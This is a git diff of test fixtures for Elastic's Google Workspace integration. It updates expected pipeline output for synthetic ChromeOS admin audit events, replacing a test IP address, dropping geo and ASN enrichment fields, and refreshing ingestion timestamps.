+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"CHROME_OS_SETTINGS","name":"ISSUE_DEVICE_COMMAND","parameters":[{"name":"DEVICE_COMMAND_DETAILS","multiValue":["command","-a"]},{"name":"DEVICE_SERIAL_NUMBER","value":"1234"},{"name":"DEVICE_TYPE","value":"type"}]}} 
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"CHROME_OS_SETTINGS","name":"MOVE_DEVICE_TO_ORG_UNIT_DETAILED","parameters":[{"name":"DEVICE_NEW_ORG_UNIT","value":"new"},{"name":"DEVICE_PREVIOUS_ORG_UNIT","value":"prev"},{"name":"DEVICE_SERIAL_NUMBER","value":"1234"},{"name":"DEVICE_TYPE","value":"type"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"CHROME_OS_SETTINGS","name":"REMOVE_CHROME_OS_APPLICATION_SETTINGS","parameters":[{"name":"APP_ID","value":"1234"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"CHROME_OS_SETTINGS","name":"UPDATE_DEVICE","parameters":[{"name":"DEVICE_SERIAL_NUMBER","value":"1234"},{"name":"DEVICE_TYPE","value":"type"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"CONTACTS_SETTINGS","name":"CHANGE_CONTACTS_SETTING","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"},{"name":"ORG_UNIT_NAME","value":"org"},{"name":"SETTING_NAME","value":"setting"}]}} 
diff --git a/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-chromeos.log-expected.json b/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-chromeos.log-expected.json
index 77ce51da980..f644b296556 100644
--- a/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-chromeos.log-expected.json
+++ b/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-chromeos.log-expected.json
@@ -10,7 +10,7 @@
 "foo"
 ],
 "ip": [
- "98.235.162.24"
+ "67.43.156.13"
 ]
 },
 "google_workspace": {
@@ -34,35 +34,17 @@
 "id": "1"
 },
 "source": {
- "geo": {
- "continent_name": "North America",
- "region_iso_code": "US-PA",
- "city_name": "State College",
- "country_iso_code": "US",
- "country_name": "United States",
- "region_name": "Pennsylvania",
- "location": {
- "lon": -77.8618,
- "lat": 40.7957
- }
- },
- "as": {
- "number": 7922,
- "organization": {
- "name": "Comcast Cable Communications, LLC"
- }
- },
 "user": {
 "name": "foo",
 "id": "1",
 "email": "foo@bar.com",
 "domain": "bar.com"
 },
- "ip": "98.235.162.24"
+ "ip": "67.43.156.13"
 },
 "event": {
- "ingested": "2021-06-09T10:57:18.974579Z",
- "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"CHROME_OS_SETTINGS\",\"name\":\"CHANGE_CHROME_OS_ANDROID_APPLICATION_SETTING\",\"parameters\":[{\"name\":\"APP_ID\",\"value\":\"2345\"},{\"name\":\"CHROME_OS_SESSION_TYPE\",\"value\":\"type\"},{\"name\":\"GROUP_EMAIL\",\"value\":\"group@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"SETTING_NAME\",\"value\":\"setting\"}]}}",
+ "ingested": "2021-12-09T13:38:27.668031200Z",
+ "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"CHROME_OS_SETTINGS\",\"name\":\"CHANGE_CHROME_OS_ANDROID_APPLICATION_SETTING\",\"parameters\":[{\"name\":\"APP_ID\",\"value\":\"2345\"},{\"name\":\"CHROME_OS_SESSION_TYPE\",\"value\":\"type\"},{\"name\":\"GROUP_EMAIL\",\"value\":\"group@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"SETTING_NAME\",\"value\":\"setting\"}]}}",
 "provider": "admin",
 "action": "CHANGE_CHROME_OS_ANDROID_APPLICATION_SETTING",
 "id": "1",
@@ -93,7 +75,7 @@
 "foo"
 ],
 "ip": [
- "98.235.162.24"
+ "67.43.156.13"
 ]
 },
 "google_workspace": {
@@ -115,35 +97,17 @@
 "id": "1"
 },
 "source": {
- "geo": {
- "continent_name": "North America",
- "region_iso_code": "US-PA",
- "city_name": "State College",
- "country_iso_code": "US",
- "country_name": "United States",
- "region_name": "Pennsylvania",
- "location": {
- "lon": -77.8618,
- "lat": 40.7957
- }
- },
- "as": {
- "number": 7922,
- "organization": {
- "name": "Comcast Cable Communications, LLC"
- }
- },
 "user": {
 "name": "foo",
 "id": "1",
 "email": "foo@bar.com",
 "domain": "bar.com"
 },
- "ip": "98.235.162.24"
+ "ip": "67.43.156.13"
 },
 "event": {
- "ingested": "2021-06-09T10:57:18.974599100Z",
- "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"CHROME_OS_SETTINGS\",\"name\":\"CHANGE_DEVICE_STATE\",\"parameters\":[{\"name\":\"DEVICE_NEW_STATE\",\"value\":\"new\"},{\"name\":\"DEVICE_PREVIOUS_STATE\",\"value\":\"prev\"},{\"name\":\"DEVICE_SERIAL_NUMBER\",\"value\":\"1234\"},{\"name\":\"DEVICE_TYPE\",\"value\":\"type\"}]}}",
+ "ingested": "2021-12-09T13:38:27.668040300Z",
+ "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"CHROME_OS_SETTINGS\",\"name\":\"CHANGE_DEVICE_STATE\",\"parameters\":[{\"name\":\"DEVICE_NEW_STATE\",\"value\":\"new\"},{\"name\":\"DEVICE_PREVIOUS_STATE\",\"value\":\"prev\"},{\"name\":\"DEVICE_SERIAL_NUMBER\",\"value\":\"1234\"},{\"name\":\"DEVICE_TYPE\",\"value\":\"type\"}]}}",
 "provider": "admin",
 "action": "CHANGE_DEVICE_STATE",
 "id": "1",
@@ -173,7 +137,7 @@
 "foo"
 ],
 "ip": [
- "98.235.162.24"
+ "67.43.156.13"
 ]
 },
 "google_workspace": {
@@ -197,35 +161,17 @@
 "id": "1"
 },
 "source": {
- "geo": {
- "continent_name": "North America",
- "region_iso_code": "US-PA",
- "city_name": "State College",
- "country_iso_code": "US",
- "country_name": "United States",
- "region_name": "Pennsylvania",
- "location": {
- "lon": -77.8618,
- "lat": 40.7957
- }
- },
- "as": {
- "number": 7922,
- "organization": {
- "name": "Comcast Cable Communications, LLC"
- }
- },
 "user": {
 "name": "foo",
 "id": "1",
 "email": "foo@bar.com",
 "domain": "bar.com"
 },
- "ip": "98.235.162.24"
+ "ip": "67.43.156.13"
 },
 "event": {
- "ingested": "2021-06-09T10:57:18.974604500Z",
- "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"CHROME_OS_SETTINGS\",\"name\":\"CHANGE_CHROME_OS_APPLICATION_SETTING\",\"parameters\":[{\"name\":\"APP_ID\",\"value\":\"2345\"},{\"name\":\"CHROME_OS_SESSION_TYPE\",\"value\":\"type\"},{\"name\":\"GROUP_EMAIL\",\"value\":\"group@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"SETTING_NAME\",\"value\":\"setting\"}]}}",
+ "ingested": "2021-12-09T13:38:27.668045400Z",
+ "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"CHROME_OS_SETTINGS\",\"name\":\"CHANGE_CHROME_OS_APPLICATION_SETTING\",\"parameters\":[{\"name\":\"APP_ID\",\"value\":\"2345\"},{\"name\":\"CHROME_OS_SESSION_TYPE\",\"value\":\"type\"},{\"name\":\"GROUP_EMAIL\",\"value\":\"group@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"SETTING_NAME\",\"value\":\"setting\"}]}}",
 "provider": "admin",
 "action": "CHANGE_CHROME_OS_APPLICATION_SETTING",
 "id": "1",
@@ -256,7 +202,7 @@
 "foo"
 ],
 "ip": [
- "98.235.162.24"
+ "67.43.156.13"
 ]
 },
 "google_workspace": {
@@ -280,35 +226,17 @@
 "id": "1"
 },
 "source": {
- "geo": {
- "continent_name": "North America",
- "region_iso_code": "US-PA",
- "city_name": "State College",
- "country_iso_code": "US",
- "country_name": "United States",
- "region_name": "Pennsylvania",
- "location": {
- "lon": -77.8618,
- "lat": 40.7957
- }
- },
- "as": {
- "number": 7922,
- "organization": {
- "name": "Comcast Cable Communications, LLC"
- }
- },
 "user": {
 "name": "foo",
 "id": "1",
 "email": "foo@bar.com",
 "domain": "bar.com"
 },
- "ip": "98.235.162.24"
+ "ip": "67.43.156.13"
 },
 "event": {
- "ingested": "2021-06-09T10:57:18.974610200Z",
- "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"CHROME_OS_SETTINGS\",\"name\":\"SEND_CHROME_OS_DEVICE_COMMAND\",\"parameters\":[{\"name\":\"DEVICE_SERIAL_NUMBER\",\"value\":\"2345\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"}]}}",
+ "ingested": "2021-12-09T13:38:27.668050400Z",
+ "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"CHROME_OS_SETTINGS\",\"name\":\"SEND_CHROME_OS_DEVICE_COMMAND\",\"parameters\":[{\"name\":\"DEVICE_SERIAL_NUMBER\",\"value\":\"2345\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"}]}}",
 "provider": "admin",
 "action": "SEND_CHROME_OS_DEVICE_COMMAND",
 "id": "1",
@@ -338,7 +266,7 @@
 "foo"
 ],
 "ip": [
- "98.235.162.24"
+ "67.43.156.13"
 ]
 },
 "google_workspace": {
@@ -362,35 +290,17 @@
 "id": "1"
 },
 "source": {
- "geo": {
- "continent_name": "North America",
- "region_iso_code": "US-PA",
- "city_name": "State College",
- "country_iso_code": "US",
- "country_name": "United States",
- "region_name": "Pennsylvania",
- "location": {
- "lon": -77.8618,
- "lat": 40.7957
- }
- },
- "as": {
- "number": 7922,
- "organization": {
- "name": "Comcast Cable Communications, LLC"
- }
- },
 "user": {
 "name": "foo",
 "id": "1",
 "email": "foo@bar.com",
 "domain": "bar.com"
 },
- "ip": "98.235.162.24"
+ "ip": "67.43.156.13"
 },
 "event": {
- "ingested": "2021-06-09T10:57:18.974614500Z",
- "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"CHROME_OS_SETTINGS\",\"name\":\"CHANGE_CHROME_OS_DEVICE_ANNOTATION\",\"parameters\":[{\"name\":\"DEVICE_SERIAL_NUMBER\",\"value\":\"2345\"}]}}",
+ "ingested": "2021-12-09T13:38:27.668056100Z",
+ "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"CHROME_OS_SETTINGS\",\"name\":\"CHANGE_CHROME_OS_DEVICE_ANNOTATION\",\"parameters\":[{\"name\":\"DEVICE_SERIAL_NUMBER\",\"value\":\"2345\"}]}}",
 "provider": "admin",
 "action": "CHANGE_CHROME_OS_DEVICE_ANNOTATION",
 "id": "1",
@@ -420,7 +330,7 @@
 "foo"
 ],
 "ip": [
- "98.235.162.24"
+ "67.43.156.13"
 ]
 },
 "google_workspace": {
@@ -442,35 +352,17 @@
 "id": "1"
 },
 "source": {
- "geo": {
- "continent_name": "North America",
- "region_iso_code": "US-PA",
- "city_name": "State College",
- "country_iso_code": "US",
- "country_name": "United States",
- "region_name": "Pennsylvania",
- "location": {
- "lon": -77.8618,
- "lat": 40.7957
- }
- },
- "as": {
- "number": 7922,
- "organization": {
- "name": "Comcast Cable Communications, LLC"
- }
- },
 "user": {
 "name": "foo",
 "id": "1",
 "email": "foo@bar.com",
 "domain": "bar.com"
 },
- "ip": "98.235.162.24"
+ "ip": "67.43.156.13"
 },
 "event": {
- "ingested": "2021-06-09T10:57:18.974619100Z",
- "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"CHROME_OS_SETTINGS\",\"name\":\"CHANGE_CHROME_OS_DEVICE_SETTING\",\"parameters\":[{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"SETTING_NAME\",\"value\":\"setting\"}]}}",
+ "ingested": "2021-12-09T13:38:27.668060700Z",
+ "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"CHROME_OS_SETTINGS\",\"name\":\"CHANGE_CHROME_OS_DEVICE_SETTING\",\"parameters\":[{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"SETTING_NAME\",\"value\":\"setting\"}]}}",
 "provider": "admin",
 "action": "CHANGE_CHROME_OS_DEVICE_SETTING",
 "id": "1",
@@ -501,7 +393,7 @@
 "foo"
 ],
 "ip": [
- "98.235.162.24"
+ "67.43.156.13"
 ]
 },
 "google_workspace": {
@@ -523,35 +415,17 @@
 "id": "1"
 },
 "source": {
- "geo": {
- "continent_name": "North America",
- "region_iso_code": "US-PA",
- "city_name": "State College",
- "country_iso_code": "US",
- "country_name": "United States",
- "region_name": "Pennsylvania",
- "location": {
- "lon": -77.8618,
- "lat": 40.7957
- }
- },
- "as": {
- "number": 7922,
- "organization": {
- "name": "Comcast Cable Communications, LLC"
- }
- },
 "user": {
 "name": "foo",
 "id": "1",
 "email": "foo@bar.com",
 "domain": "bar.com"
 },
- "ip": "98.235.162.24"
+ "ip": "67.43.156.13"
 },
 "event": {
- "ingested": "2021-06-09T10:57:18.974623400Z",
- "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"CHROME_OS_SETTINGS\",\"name\":\"CHANGE_CHROME_OS_DEVICE_STATE\",\"parameters\":[{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"DEVICE_SERIAL_NUMBER\",\"value\":\"1234\"}]}}",
+ "ingested": "2021-12-09T13:38:27.668065200Z",
+ "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"CHROME_OS_SETTINGS\",\"name\":\"CHANGE_CHROME_OS_DEVICE_STATE\",\"parameters\":[{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"DEVICE_SERIAL_NUMBER\",\"value\":\"1234\"}]}}",
 "provider": "admin",
 "action": "CHANGE_CHROME_OS_DEVICE_STATE",
 "id": "1",
@@ -581,7 +455,7 @@
 "foo"
 ],
 "ip": [
- "98.235.162.24"
+ "67.43.156.13"
 ]
 },
 "google_workspace": {
@@ -603,35 +477,17 @@
 "id": "1"
 },
 "source": {
- "geo": {
- "continent_name": "North America",
- "region_iso_code": "US-PA",
- "city_name": "State College",
- "country_iso_code": "US",
- "country_name": "United States",
- "region_name": "Pennsylvania",
- "location": {
- "lon": -77.8618,
- "lat": 40.7957
- }
- },
- "as": {
- "number": 7922,
- "organization": {
- "name": "Comcast Cable Communications, LLC"
- }
- },
 "user": {
 "name": "foo",
 "id": "1",
 "email": "foo@bar.com",
 "domain": "bar.com"
 },
- "ip": "98.235.162.24"
+ "ip": "67.43.156.13"
 },
 "event": {
- "ingested": "2021-06-09T10:57:18.974627600Z",
- "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"CHROME_OS_SETTINGS\",\"name\":\"CHANGE_CHROME_OS_PUBLIC_SESSION_SETTING\",\"parameters\":[{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"SETTING_NAME\",\"value\":\"setting\"}]}}",
+ "ingested": "2021-12-09T13:38:27.668069700Z",
+ "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"CHROME_OS_SETTINGS\",\"name\":\"CHANGE_CHROME_OS_PUBLIC_SESSION_SETTING\",\"parameters\":[{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"SETTING_NAME\",\"value\":\"setting\"}]}}",
 "provider": "admin",
 "action": "CHANGE_CHROME_OS_PUBLIC_SESSION_SETTING",
 "id": "1",
@@ -662,7 +518,7 @@
 "foo"
 ],
 "ip": [
- "98.235.162.24"
+ "67.43.156.13"
 ]
 },
 "google_workspace": {
@@ -686,35 +542,17 @@
 "id": "1"
 },
 "source": {
- "geo": {
- "continent_name": "North America",
- "region_iso_code": "US-PA",
- "city_name": "State College",
- "country_iso_code": "US",
- "country_name": "United States",
- "region_name": "Pennsylvania",
- "location": {
- "lon": -77.8618,
- "lat": 40.7957
- }
- },
- "as": {
- "number": 7922,
- "organization": {
- "name": "Comcast Cable Communications, LLC"
- }
- },
 "user": {
 "name": "foo",
 "id": "1",
 "email": "foo@bar.com",
 "domain": "bar.com"
 },
- "ip": "98.235.162.24"
+ "ip": "67.43.156.13"
 },
 "event": {
- "ingested": "2021-06-09T10:57:18.974631800Z",
- "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"CHROME_OS_SETTINGS\",\"name\":\"INSERT_CHROME_OS_PRINT_SERVER\",\"parameters\":[{\"name\":\"PRINT_SERVER_NAME\",\"value\":\"server\"}]}}",
+ "ingested": "2021-12-09T13:38:27.668073700Z",
+ "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"CHROME_OS_SETTINGS\",\"name\":\"INSERT_CHROME_OS_PRINT_SERVER\",\"parameters\":[{\"name\":\"PRINT_SERVER_NAME\",\"value\":\"server\"}]}}",
 "provider": "admin",
 "action": "INSERT_CHROME_OS_PRINT_SERVER",
 "id": "1",
@@ -744,7 +582,7 @@
 "foo"
 ],
 "ip": [
- "98.235.162.24"
+ "67.43.156.13"
 ]
 },
 "google_workspace": {
@@ -768,35 +606,17 @@
 "id": "1"
 },
 "source": {
- "geo": {
- "continent_name": "North America",
- "region_iso_code": "US-PA",
- "city_name": "State College",
- "country_iso_code": "US",
- "country_name": "United States",
- "region_name": "Pennsylvania",
- "location": {
- "lon": -77.8618,
- "lat": 40.7957
- }
- },
- "as": {
- "number": 7922,
- "organization": {
- "name": "Comcast Cable Communications, LLC"
- }
- },
 "user": {
 "name": "foo",
 "id": "1",
 "email": "foo@bar.com",
 "domain": "bar.com"
 },
- "ip": "98.235.162.24"
+ "ip": "67.43.156.13"
 },
 "event": {
- "ingested": "2021-06-09T10:57:18.974635800Z",
- "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"CHROME_OS_SETTINGS\",\"name\":\"DELETE_CHROME_OS_PRINT_SERVER\",\"parameters\":[{\"name\":\"PRINT_SERVER_NAME\",\"value\":\"server\"}]}}",
+ "ingested": "2021-12-09T13:38:27.668078700Z",
+ "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"CHROME_OS_SETTINGS\",\"name\":\"DELETE_CHROME_OS_PRINT_SERVER\",\"parameters\":[{\"name\":\"PRINT_SERVER_NAME\",\"value\":\"server\"}]}}",
 "provider": "admin",
 "action": "DELETE_CHROME_OS_PRINT_SERVER",
 "id": "1",
@@ -826,7 +646,7 @@
 "foo"
 ],
 "ip": [
- "98.235.162.24"
+ "67.43.156.13"
 ]
 },
 "google_workspace": {
@@ -850,35 +670,17 @@
 "id": "1"
 },
 "source": {
- "geo": {
- "continent_name": "North America",
- "region_iso_code": "US-PA",
- "city_name": "State College",
- "country_iso_code": "US",
- "country_name": "United States",
- "region_name": "Pennsylvania",
- "location": {
- "lon": -77.8618,
- "lat": 40.7957
- }
- },
- "as": {
- "number": 7922,
- "organization": {
- "name": "Comcast Cable Communications, LLC"
- }
- },
 "user": {
 "name": "foo",
 "id": "1",
 "email": "foo@bar.com",
 "domain": "bar.com"
 },
- "ip": "98.235.162.24"
+ "ip": "67.43.156.13"
 },
 "event": {
- "ingested": "2021-06-09T10:57:18.974639700Z",
- "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"CHROME_OS_SETTINGS\",\"name\":\"UPDATE_CHROME_OS_PRINT_SERVER\",\"parameters\":[{\"name\":\"PRINT_SERVER_NAME\",\"value\":\"server\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}",
+ "ingested": "2021-12-09T13:38:27.668084500Z",
+ "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"CHROME_OS_SETTINGS\",\"name\":\"UPDATE_CHROME_OS_PRINT_SERVER\",\"parameters\":[{\"name\":\"PRINT_SERVER_NAME\",\"value\":\"server\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}",
 "provider": "admin",
 "action": "UPDATE_CHROME_OS_PRINT_SERVER",
 "id": "1",
@@ -908,7 +710,7 @@
 "foo"
 ],
 "ip": [
- "98.235.162.24"
+ "67.43.156.13"
 ]
 },
 "google_workspace": {
@@ -932,35 +734,17 @@
 "id": "1"
 },
 "source": {
- "geo": {
- "continent_name": "North America",
- "region_iso_code": "US-PA",
- "city_name": "State College",
- "country_iso_code": "US",
- "country_name": "United States",
- "region_name": "Pennsylvania",
- "location": {
- "lon": -77.8618,
- "lat": 40.7957
- }
- },
- "as": {
- "number": 7922,
- "organization": {
- "name": "Comcast Cable Communications, LLC"
